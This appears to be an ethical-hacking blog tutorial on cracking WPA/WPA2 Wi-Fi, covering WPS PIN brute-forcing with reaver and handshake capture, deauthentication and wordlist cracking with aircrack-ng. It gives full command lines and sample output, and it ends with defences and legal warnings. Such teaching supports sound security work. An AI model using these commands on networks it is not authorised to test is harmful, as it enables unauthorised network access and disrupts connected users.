WPA and WPA2 Cracking: Understanding WPS Vulnerabilities

In our previous article, we explored Wi-Fi deauthentication attacks and their role in ethical hacking. Today, we'll dive deeper into wireless security by examining WPA and WPA2 cracking techniques, with a special focus on WPS (Wi-Fi Protected Setup) vulnerabilities and handshake attacks.

WPA (Wi-Fi Protected Access) and its successor WPA2 are the most common security protocols used to protect wireless networks. While they offer significant improvements over the deprecated WEP standard, they're not impervious to attacks—especially when combined with vulnerable features like WPS.

Understanding WPS and Its Vulnerabilities

WPS (Wi-Fi Protected Setup) is a network security standard designed to simplify the process of connecting devices to a wireless network. Instead of requiring users to enter a long, complex password, WPS allows connection through alternative methods:

PIN Method: An 8-digit PIN printed on the router
Push Button Configuration (PBC): Physically pressing a button on the router
Near Field Communication (NFC): Tapping an NFC-enabled device against the router
USB Method: Using a USB drive to transfer network settings

The PIN method is particularly interesting from a security perspective because it introduces a critical vulnerability. An 8-digit PIN provides only 10^8 (100,000,000) possible combinations. While this might seem large, the WPS authentication process divides the PIN into two halves, effectively reducing the number of required guesses to just 11,000 (10^4 + 10^3).

WPS PIN Vulnerability Explained:

The WPS PIN is validated in two segments: the first 4 digits and the last 3 digits (the 8th digit is a checksum). This design flaw allows attackers to brute-force each segment separately, dramatically reducing the time required to crack the PIN from years to just hours.

WPS Attack Methodology

Before attempting a WPS attack, it's crucial to verify that the target network has WPS enabled and is vulnerable. This attack will only work if:

The router has WPS enabled
The router is not using PBC (Push Button Authentication) exclusively
The router doesn't implement WPS lockout after failed attempts

Step 1: Scanning for WPS-Enabled Networks

We use the wash tool to scan for networks with WPS enabled:

root@kali:~# wash --interface wlan0 BSSID Ch dBm WPS Lck Vendor ESSID -------------------------------------------------------------------------------- 84:D8:1B:BF:71:2E 1 -31 2.0 No NetGear wifi_name_lorem_2.4GHz

In this output, we can see important information:

BSSID: The MAC address of the access point
Ch: The channel the AP is operating on
dBm: Signal strength in decibel-milliwatts
WPS: WPS version (2.0 in this case)
Lck: WPS lock status (No means it's not locked)
Vendor: Router manufacturer
ESSID: Network name

The "Lck: No" status indicates that the router's WPS is not locked, making it vulnerable to brute-force attacks.

Step 2: Brute-Forcing the WPS PIN

With our target identified, we use reaver to brute-force the WPS PIN:

root@kali:~# reaver --bssid 84:D8:1B:BF:71:2E --channel 1 --interface wlan0

Reaver will systematically try different PIN combinations. During this process, it may need to re-authenticate with the access point, which can be done using aireplay-ng:

root@kali:~# aireplay-ng --fakeauth 30 -a 84:D8:1B:BF:71:2E -h 6C:60:EB:C7:51:A2 wlan0

In this command:

--fakeauth 30: Sends a fake authentication request every 30 seconds
-a 84:D8:1B:BF:71:2E: The target access point's MAC address
-h 6C:60:EB:C7:51:A2: Your wireless adapter's MAC address
wlan0: Your wireless interface

Step 3: Retrieving the Network Credentials

Once Reaver successfully cracks the WPS PIN, it will display both the PIN and the network's PSK (Pre-Shared Key), which is the actual Wi-Fi password:

[+] WPS PIN: '12345670' [+] WPA PSK: 'MySecureWiFiPassword123' [+] AP SSID: 'wifi_name_lorem_2.4GHz'

Important Note:

Many modern routers implement WPS lockout mechanisms that temporarily disable WPS after several failed PIN attempts. Some routers may even permanently lock WPS, requiring a factory reset. Always test on your own equipment or with explicit permission.

Handshake Attacks: When WPS Is Disabled

If WPS is disabled on the target network, we need to resort to handshake attacks. This method involves capturing the cryptographic handshake that occurs when a device connects to a WPA/WPA2-protected network.

Understanding the Four-Way Handshake

The four-way handshake is a process that establishes a secure connection between a client and an access point in WPA/WPA2 networks. It serves two main purposes:

Confirming that both parties know the Pre-Shared Key (PSK)
Deriving fresh encryption keys for the session

The handshake consists of four messages exchanged between the access point (authenticator) and the client (supplicant):

Four-Way Handshake Process

AP → Client: Sends ANonce (AP Nonce)

Client → AP: Sends SNonce (Client Nonce) and MIC (Message Integrity Code)

AP → Client: Sends GTK (Group Temporal Key) and MIC

Client → AP: Confirmation message

Step 1: Capturing the Handshake

We use airodump-ng to capture packets from the target network:

root@kali:~# airodump-ng --bssid 84:D8:1B:BF:71:2E --channel 1 --write wpahandshake wlan0

This command:

Focuses on the specific access point (--bssid)
Monitors the correct channel (--channel 1)
Saves captured packets to a file (--write wpahandshake)
Uses the specified wireless interface (wlan0)

At this point, we need to wait for a client to connect to the network naturally, or we can force a reconnection using a deauthentication attack.

Step 2: Triggering a Handshake with Deauthentication

Instead of waiting for a client to connect, we can force an existing client to reconnect by sending deauthentication packets:

root@kali:~# aireplay-ng --deauth 4 -a 84:D8:1B:BF:71:2E -c 8C:85:90:65:EC:F5 wlan0

This command sends 4 deauthentication packets to disconnect the specified client, which will then automatically attempt to reconnect, generating a new handshake that we can capture.

When a handshake is successfully captured, airodump-ng will display "[ WPA handshake: ... ]" in the top-right corner of the interface.

Step 3: Creating a Wordlist

With the handshake captured, we need to attempt to crack the password using a wordlist. We can generate custom wordlists using tools like crunch:

root@kali:~# crunch 6 8 123abc$ -o wordlist.txt -t a@@@@@b

This command generates passwords with the following characteristics:

Minimum length: 6 characters
Maximum length: 8 characters
Character set: 1, 2, 3, a, b, c, $
Pattern: Starts with 'a', ends with 'b', with variable characters in between
Output file: wordlist.txt

Step 4: Cracking the Handshake

Now we use aircrack-ng to attempt to crack the password by testing each word in our list against the captured handshake:

root@kali:~# aircrack-ng wpahandshake-01.cap -w wordlist.txt

If successful, aircrack-ng will display "KEY FOUND!" followed by the network password.

The Technical Details: How Handshake Cracking Works

Understanding the technical process behind handshake cracking helps explain why it's effective:

When we capture a handshake, we obtain several pieces of information:

AP MAC Address: The MAC address of the access point
Client MAC Address: The MAC address of the connecting client
AP Nonce: A random number generated by the access point
Client Nonce: A random number generated by the client
EAPOL Payload (Extensible Authentication Protocol over LAN): The authentication data
MIC (Message Integrity Code): A cryptographic hash that verifies message integrity

The critical insight is that the MIC is calculated using all the other elements plus the password. Since we have all the elements except the password, we can:

Take a password candidate from our wordlist
Combine it with the other handshake elements (AP MAC, Client MAC, etc.)
Calculate what the MIC should be if this were the correct password
Compare our calculated MIC with the captured MIC
If they match, we've found the correct password

This process allows us to test passwords offline, without further interaction with the network, making it difficult to detect.

Protection Against WPA/WPA2 Attacks

Now that we understand how these attacks work, let's explore effective defense strategies:

Protection Method	Explanation	Effectiveness
Disable WPS	Completely turn off WPS functionality on your router	High (against WPS attacks)
Use WPA3	Upgrade to WPA3, which provides stronger protection	High
Strong Passwords	Use long, complex passwords (15+ characters with variety)	High (against handshake attacks)
Implement WPS Lockout	Configure routers to lock WPS after failed attempts	Medium
MAC Address Filtering	Restrict network access to specific device MAC addresses	Low (MAC addresses can be spoofed)
Network Monitoring	Use intrusion detection systems to spot attack patterns	Medium

Best Practices for Wireless Security:

Disable WPS on all routers (it's often enabled by default)
Use WPA3 if available, or WPA2 with AES encryption
Create passwords with at least 15 characters, including uppercase, lowercase, numbers, and symbols
Regularly update router firmware to patch vulnerabilities
Monitor network logs for unusual authentication patterns
Consider using enterprise-grade authentication (WPA-Enterprise) for business networks

Legal and Ethical Considerations

Warning: Performing these attacks on networks you don't own or without explicit permission is illegal in most jurisdictions. This information is provided for educational purposes only.

Ethical hackers use these techniques for:

Security Audits: Testing the strength of organizational wireless security
Penetration Testing: Identifying vulnerabilities before malicious actors do
Digital Forensics: Investigating security incidents
Education: Teaching network administrators about wireless vulnerabilities

Always obtain written permission before testing any network security measures. Document your activities thoroughly and follow responsible disclosure practices if vulnerabilities are discovered.

Conclusion

WPA and WPA2 cracking techniques, particularly those exploiting WPS vulnerabilities and capturing handshakes, demonstrate the importance of robust wireless security practices. While these protocols represent significant improvements over earlier standards, they're not foolproof—especially when combined with convenience features like WPS.

Understanding these attack vectors is crucial for both security professionals tasked with protecting networks and ethical hackers performing authorized penetration tests. As wireless technologies continue to evolve with standards like WPA3, we can expect improved security, but the fundamental principles of strong passwords, regular updates, and disabling unnecessary features will remain relevant.

Key Takeaways:

WPS introduces a significant vulnerability due to its 8-digit PIN authentication
Handshake attacks allow offline password cracking without further network interaction
Strong, complex passwords are the best defense against handshake attacks
Disabling WPS is the most effective protection against WPS-based attacks
Always obtain proper authorization before testing network security
WPA3 offers improved security and should be used when available

By understanding both the offensive techniques and defensive strategies, we can work toward more secure wireless networks in an increasingly connected world.